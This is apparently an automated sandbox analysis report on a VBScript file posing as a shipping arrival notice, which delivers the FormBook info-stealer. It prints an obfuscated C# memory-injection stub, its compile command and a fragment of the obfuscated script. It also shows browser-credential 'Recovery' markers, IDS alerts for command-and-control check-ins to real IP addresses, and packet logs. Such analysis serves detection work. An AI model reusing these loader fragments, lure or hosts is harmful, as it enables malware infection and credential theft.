                                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.0.s.t.5.w.f.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...r.0.s.t.5.w.f.i...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                              C:\Users\user\AppData\Local\Temp\r0st5wfi\r0st5wfi.0.cs

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):701
                                                                                                              Entropy (8bit):5.127119938321933
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:V/DGrgCP+OpR6zSCCUTx4MwhAnJSilfg8QyW8FwFn7xRffyhL:JogCPd8zSC3TxuWdPQ2F+FRffo
                                                                                                              MD5:75A7F182D30D472DF5CD3322448DF89D
                                                                                                              SHA1:68E1B8063A0F6F64172493F96F47B6E14255E184
                                                                                                              SHA-256:7669A3E475487489474C7C2474EB67E074D052F1451E2A19C5368DDF191D9B51
                                                                                                              SHA-512:36AE66415BD088863DB0F38B874148EEC0FA644A76C90CF1D056B0A4591D0EBB61D38F3361FB1F854B6B391C0B31AF582A3ED783F568054CDA9AEBC4C6A1BDB1
                                                                                                              Malicious:false
                                                                                                              Preview:.using System;..using System.Runtime.InteropServices;..public static class Decapitat1..{..[DllImport("kernel32")]public static extern void SleepEx(int Bradysp0);..[DllImport("user32")]public static extern void GetWindowDC();....[DllImport("ntdll", EntryPoint="NtAllocateVirtualMemory")]public static extern int VitroSolid(int Decapitat6,ref Int32 Symptomi,int Sprog,ref Int32 Decapitat,int Unflagfo40,int Decapitat7);..[DllImport("D2stamp")]public static extern void PoolStack();..[DllImport("user32", EntryPoint="EnumWindows")]public static extern IntPtr Morqq(uint Sprog5,int Sprog6);..[DllImport("kernel32")]public static extern void RtlMoveMemory(IntPtr Sprog1,ref Int32 Sprog2,int Sprog3);....}

                                                                                                              C:\Users\user\AppData\Local\Temp\r0st5wfi\r0st5wfi.cmdline

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):371
                                                                                                              Entropy (8bit):5.216797351419088
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CN23f3n0zxs7+AEszICN23f2WHn:p37Lvkmb6Km8WZE7OWHn
                                                                                                              MD5:C0F3FB410B93E79A3BDD788123574C4E
                                                                                                              SHA1:EF1DBF4EE4750F48D90BB87F1A5F58ADFDFD7E26
                                                                                                              SHA-256:7108A54DD48E2E4C7F59B5CE6256173C65C377E3EA5EA702AC1B9C625C08595F
                                                                                                              SHA-512:4928ECFA0B0D1695C784DEDDE0F96A3D6BB7AA59EEE28F295F9FCCFCF3F9DAEA8475D9C74670FB5EA1221ACDE98CB80E0F00146942D2FCD152036CD40B1CC839
                                                                                                              Malicious:false
                                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\r0st5wfi\r0st5wfi.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\r0st5wfi\r0st5wfi.0.cs"

                                                                                                              C:\Users\user\AppData\Local\Temp\r0st5wfi\r0st5wfi.dll

                                                                                                              Download File
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):3584
                                                                                                              Entropy (8bit):2.958508687902532
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:etGShccOAGKwr8q7bCXK7OXbKLONTUOktkFnix6iyhzzQ2WI+ycuZhNoakSkPNnq:67bwY07WbK6NTFniIiyhzw1uloa3kq
                                                                                                              MD5:38EB968262007DA5B42583DD5506EE63
                                                                                                              SHA1:C545535E6AB8B6E98ED204A50452DE12B51D4726
                                                                                                              SHA-256:9D015836FF84608D0F56AFDBC0605D08D932D20B6E4B2F30905CAF4E9D307FE5
                                                                                                              SHA-512:26465CA93C695EB97EB9B7676DCE105C3DDBE29CA41EBA575177A36A98B9CE8B0AC27EA7BF4BB17D1356FCC33C531ECCF38D2A555B9C80F521689A047C7D180A
                                                                                                              Malicious:false
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c...........!.................$... ...@....... ....................................@..................................$..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................$......H.......P ..H...........................................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......d...#Blob...........G.........%3............................................................2.+.........".....h.I.................................... 9............ A............ M............ X............ b............ h.%.......v.......................................................................-.....2.!.

                                                                                                              C:\Users\user\AppData\Local\Temp\r0st5wfi\r0st5wfi.out

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                                                                                                              Category:modified
                                                                                                              Size (bytes):870
                                                                                                              Entropy (8bit):5.288031189138293
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:KSqd3ka6KmtE7O1Kax5DqBVKVrdFAMBJTH:dika6PtE7cK2DcVKdBJj
                                                                                                              MD5:66C2CE507016CF0864E8DED5B0B86906
                                                                                                              SHA1:F61E6F6D1DDF60DACA16EBAB2E1A9F33D8AA483C
                                                                                                              SHA-256:4BA2A7E477DD1F0C542286C696E34A73F4FEC7C11F87AA9BD91C6422FAB4B844
                                                                                                              SHA-512:B77258701C78E842A417FE8272236D8C09978062B8FD43E78945C4B5C70E125F07F2DE4B3E67E87F5311074C08E0BD3626A616F45EF2A91B6C046F5518A1F850
                                                                                                              Malicious:false
                                                                                                              Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\r0st5wfi\r0st5wfi.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\r0st5wfi\r0st5wfi.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                              C:\Users\user\AppData\Roaming\O228O718\O22logim.jpeg

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1920x1080, frames 3
                                                                                                              Category:dropped
                                                                                                              Size (bytes):138216
                                                                                                              Entropy (8bit):7.801445782420948
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:2UraTSNxKM19vkhi7qZU6C0fHkSqqnnADYpvymzo223dhUowK:kmcM19vkY6l/VADYpKmknd2K
                                                                                                              MD5:84BE15D3BE604EBBEAEA6A3D588A2F9D
                                                                                                              SHA1:209477024E1709CCFF51FE4DB886B6CCB60E9FD7
                                                                                                              SHA-256:D1381BAFDD2FA3A03240F5C463D3614D334C57897B06D648B4017A852B248519
                                                                                                              SHA-512:1727DD4069BE685EC134341C51F62FFC1E24FE01EDCB5E731C1156CC8F6BF77F3EB374EB20A1F31F172607F650709B699021C9C127E39F540F78BB51561CAF87
                                                                                                              Malicious:false
                                                                                                              Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......8...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?0.Z.oaqs......21....}.ZM:...[+J}#.G.y.+...p.....Mb.3(...l.......;g.$~.....m.....~....8.r.CY.+Gm}.j*..wj7M.*.|r...WJ...g..(.IX(..b..^i(...=?.o...~......<.....V..y.....A.....e.f..f.zK..Z.I...R..X.......g.b?......=oI..K.?...}.6.$c...p....S.Q.....9V3.O.V......E-...p.QE..QS.r.>"..dd......U-....lf%ahJ.W...v_...x.......{....rzu.=.(.P...u.\../?../...K.........

                                                                                                              C:\Users\user\AppData\Roaming\O228O718\O22logrf.ini

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):40
                                                                                                              Entropy (8bit):2.8420918598895937
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:VSiftlAlGQJhIl:VSVlGQPY
                                                                                                              MD5:2F245469795B865BDD1B956C23D7893D
                                                                                                              SHA1:6AD80B974D3808F5A20EA1E766C7D2F88B9E5895
                                                                                                              SHA-256:1662D01A2D47B875A34FC7A8CD92E78CB2BA7F34023C7FD2639CBB10B8D94361
                                                                                                              SHA-512:909F189846A5D2DB208A5EB2E7CB3042C0F164CAF437E2B1B6DE608C0A70E4F3510B81B85753DBEEC1E211E6A83E6EA8C96AFF896E9B6E8ED42014473A54DC4F
                                                                                                              Malicious:true
                                                                                                              Preview:....F.i.r.e.f.o.x. .R.e.c.o.v.e.r.y.....

                                                                                                              C:\Users\user\AppData\Roaming\O228O718\O22logrg.ini

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):38
                                                                                                              Entropy (8bit):2.7883088224543333
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:rFGQJhIl:RGQPY
                                                                                                              MD5:4AADF49FED30E4C9B3FE4A3DD6445EBE
                                                                                                              SHA1:1E332822167C6F351B99615EADA2C30A538FF037
                                                                                                              SHA-256:75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
                                                                                                              SHA-512:EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
                                                                                                              Malicious:false
                                                                                                              Preview:....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....

                                                                                                              C:\Users\user\AppData\Roaming\O228O718\O22logri.ini

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):40
                                                                                                              Entropy (8bit):2.8420918598895937
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:+slXllAGQJhIl:dlIGQPY
                                                                                                              MD5:D63A82E5D81E02E399090AF26DB0B9CB
                                                                                                              SHA1:91D0014C8F54743BBA141FD60C9D963F869D76C9
                                                                                                              SHA-256:EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
                                                                                                              SHA-512:38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
                                                                                                              Malicious:true
                                                                                                              Preview:....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....

                                                                                                              C:\Users\user\AppData\Roaming\O228O718\O22logrv.ini

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):40
                                                                                                              Entropy (8bit):2.96096404744368
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:AJlbeGQJhIl:tGQPY
                                                                                                              MD5:BA3B6BC807D4F76794C4B81B09BB9BA5
                                                                                                              SHA1:24CB89501F0212FF3095ECC0ABA97DD563718FB1
                                                                                                              SHA-256:6EEBF968962745B2E9DE2CA969AF7C424916D4E3FE3CC0BB9B3D414ABFCE9507
                                                                                                              SHA-512:ECD07E601FC9E3CFC39ADDD7BD6F3D7F7FF3253AFB40BF536E9EAAC5A4C243E5EC40FBFD7B216CB0EA29F2517419601E335E33BA19DEA4A46F65E38694D465BF
                                                                                                              Malicious:true
                                                                                                              Preview:...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.....

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:ISO-8859 text, with very long lines, with CRLF line terminators
                                                                                                              Entropy (8bit):4.36038820472708
                                                                                                              TrID:
                                                                                                              • Visual Basic Script (13500/0) 100.00%
                                                                                                              File name:NOA_CMACGM_Notice_of_Arrival_ONEGO_BORA_0JH0JR1MA_1661088550291R021206.vbs
                                                                                                              File size:365066
                                                                                                              MD5:c135e86f18c163467d7cd19771896ca7
                                                                                                              SHA1:cb5bfae30b2658e0ce4131afbafb26c671651e50
                                                                                                              SHA256:a2762f35bec58d4ab2672ac25ae1c550b9ba87d124f4cef69fad842e46b4de5c
                                                                                                              SHA512:b094aa60bca42a9bee0547128264dda291c952b093e2eca24464188aee108fee8e072e64d6eb536b2d2c89200766ad135ed4469e88747aa79acbdcf109333a9c
                                                                                                              SSDEEP:1536:zKYXewXxNC48OfSuqLdUYU3EIQugos5tvwJ8+LpjX8Rf++2vfDcSxRT2UGKFdA+U:+w3jyGrkIQug8veyXlH87oCWO2q
                                                                                                              TLSH:5C742B44B359A4554DBA0020751CD7160F52A19ABBE7C722471AD3F9CBA2037EB3BE8F
                                                                                                              File Content Preview:Sub EDEMAS(diskofilerneshypercalcin,Raseringwingierchenil)....Dim COEQUALITYUNTRUSTEDPE..COEQUALITYUNTRUSTEDPE = Space(181)....If Raseringwingierchenil = cstr(7380826) Then ....Dim procommunitygamme..procommunitygamme = procommunitygamme & "SUPERABNORMALL

                                                                                                              File Icon

                                                                                                              Icon Hash:e8d69ece869a9ec4

                                                                                                              Network Behavior

                                                                                                              Snort IDS Alerts

                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                              192.168.11.2035.155.7.18349792802031449 08/22/22-20:06:33.491474TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979280192.168.11.2035.155.7.183
                                                                                                              192.168.11.2045.77.55.16149797802031449 08/22/22-20:07:16.415553TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979780192.168.11.2045.77.55.161
                                                                                                              192.168.11.20166.88.142.6349782802031449 08/22/22-20:04:07.235965TCP2031449ET TROJAN FormBook CnC Checkin (GET)4978280192.168.11.20166.88.142.63
                                                                                                              192.168.11.20166.88.142.6349782802031453 08/22/22-20:04:07.235965TCP2031453ET TROJAN FormBook CnC Checkin (GET)4978280192.168.11.20166.88.142.63
                                                                                                              192.168.11.201.1.1.159647532023883 08/22/22-20:04:50.388391UDP2023883ET DNS Query to a *.top domain - Likely Hostile5964753192.168.11.201.1.1.1
                                                                                                              192.168.11.201.1.1.153900532023883 08/22/22-20:06:13.557677UDP2023883ET DNS Query to a *.top domain - Likely Hostile5390053192.168.11.201.1.1.1
                                                                                                              192.168.11.2045.77.55.16149797802031453 08/22/22-20:07:16.415553TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979780192.168.11.2045.77.55.161
                                                                                                              192.168.11.2035.155.7.18349792802031412 08/22/22-20:06:33.491474TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979280192.168.11.2035.155.7.183
                                                                                                              192.168.11.2045.77.55.16149797802031412 08/22/22-20:07:16.415553TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979780192.168.11.2045.77.55.161
                                                                                                              192.168.11.20166.88.142.6349782802031412 08/22/22-20:04:07.235965TCP2031412ET TROJAN FormBook CnC Checkin (GET)4978280192.168.11.20166.88.142.63
                                                                                                              192.168.11.2035.155.7.18349792802031453 08/22/22-20:06:33.491474TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979280192.168.11.2035.155.7.183

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Aug 22, 2022 20:02:06.201901913 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.201963902 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.202173948 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.254879951 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.254940033 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.368525028 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.368755102 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.368789911 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.521948099 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.521997929 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.522757053 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.522924900 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.527218103 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.567487955 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.567550898 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.567790985 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.567837000 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.567845106 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.568097115 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.605591059 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.605813026 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.605870008 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.606086016 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.606267929 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.606292963 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.606434107 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.606637955 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.606663942 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.606781960 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.607036114 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.607065916 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.645323038 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.645589113 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.645629883 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.645967960 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.646186113 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.646222115 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.646572113 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.646785975 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.646807909 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.646816015 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.647044897 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.647264957 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.647314072 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.647332907 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.647490025 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.647505045 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.647511005 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.647516012 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.647521973 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.647526979 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.647547007 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.647567034 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.647713900 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.647732019 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.647854090 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.647912025 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.647943974 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.648102045 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.648133039 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.648143053 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.648153067 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.648164988 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.648339987 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.686707973 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.687263012 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.687397003 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.687609911 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.687634945 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.687726021 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.687937021 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.687968016 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.688107967 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.688168049 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.688349962 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.688462973 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.688483953 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.688492060 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.688508034 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.688515902 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.688566923 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.688713074 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.688731909 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.688756943 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.688776016 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.688852072 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.688952923 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.689086914 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.689131021 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.689152956 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.689160109 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.689167976 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.689174891 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.689181089 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.689188004 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.689271927 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.689291000 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.689462900 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.689476967 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.689482927 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.689496040 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.689518929 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.689696074 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.689708948 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.689718962 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.689740896 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.689946890 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.689979076 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.689987898 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.690001011 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.690100908 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.690318108 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.690334082 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.899574995 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.899622917 CEST44349780109.94.209.55192.168.11.20
                                                                                                              Aug 22, 2022 20:02:06.899646997 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:02:06.899879932 CEST49780443192.168.11.20109.94.209.55
                                                                                                              Aug 22, 2022 20:04:07.074067116 CEST4978280192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:07.235658884 CEST8049782166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:07.235915899 CEST4978280192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:07.235965014 CEST4978280192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:07.397522926 CEST8049782166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:07.741194010 CEST4978280192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:07.902955055 CEST8049782166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:07.903161049 CEST4978280192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:09.780745983 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:09.946206093 CEST8049783166.88.142.63192.168.11.20
                                                                                                              Aug 22, 2022 20:04:09.946348906 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:09.948226929 CEST4978380192.168.11.20166.88.142.63
                                                                                                              Aug 22, 2022 20:04:09.948250055 CEST4978380192.168.11.20166.88.142.63
